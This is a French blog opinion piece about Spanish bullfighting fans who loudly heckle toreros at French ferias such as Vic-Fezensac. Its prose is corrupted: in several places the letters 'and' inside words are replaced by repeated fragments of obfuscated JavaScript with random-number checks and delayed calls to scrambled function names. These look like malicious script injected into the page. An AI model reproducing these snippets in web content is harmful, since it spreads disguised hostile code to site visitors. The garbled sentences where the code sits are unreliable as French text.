LE “CONNAISSEUR” EN TOURISTE

Ce sont des personnages que l’on remarque de plus en plus en France. Les distances sont plus courtes sur la route et surtout les vols “low-cost” permettent aux aficionados espagnols de découvrir les ferias françaises. Parmi eux il y a des “docteurs” en la matière qui sentent la Fiesta comme quelque chose leur appartenant, ce qui n’est pas foncièrement mauvais, mais qui une fois dans les arènes détonnent par leur comportement ce qui est parfois insupportable, comme ce fut le cas à Vic-Fezensac le week-end dernier. Au lieu d’essayer de comprendre une aficion avec ses singularités, de respecter le silence de ses arènes, il le brisent à la moindre occasion. Ils se permettent de récriminer les picadors avec vulgarité et encore plus les matadors. Pour eux l’emplacement n’est jamais le correct, les professionnels n’y connaissent rien et ils se permetten même de pertuber la lidia comme avec Antonio Ferrera. Ils savent tout, les toreros ne valent pas un clou et ça doit se savoir. Bien évidemment ils ne font pas l’effort de le dire en français, pour en “informer” le public qui en grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande majorité ne parle pas couramment le castillan, l’important c’est qu’eux se défoulent. Rien ne leur convient et ils protestent tout. Ils se taisent uniquement quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and le public se régale du spectacle dans l’arène, des succès qu’eux avaient anticipé avant quiconque et qu’il faut relativiser. Le public français en général est assez tolérant et il y en a même, dans un espagnol souvent approximatif, qui cherchent à comprendre le pourquoi de leur attitude. Ce moment pour ces spécialistes auto-proclamés est le plus jouissif, ils ont l’impression de jouer le rôle d’éclaireurs.

Des personnages que l’on pourrait trouver sympathiques par leur côté caricatural mais quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il y a quelqu’un dans l’arène qui se joue la vie, l’impertinence, la vulgarité et surtout le mépris de leurs commentaires les rend assez abjects.

La Fiesta est libre, chacun peut dire ce qu’il ressent, ce qu’il pense, mais cela n’empêche pas qu’il y a certains qui sont vraiment lourds, surtout quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and ils sortent hors de chez et se lachent. De vrais touristes au pays du Toro.

Les commentaires sont fermés.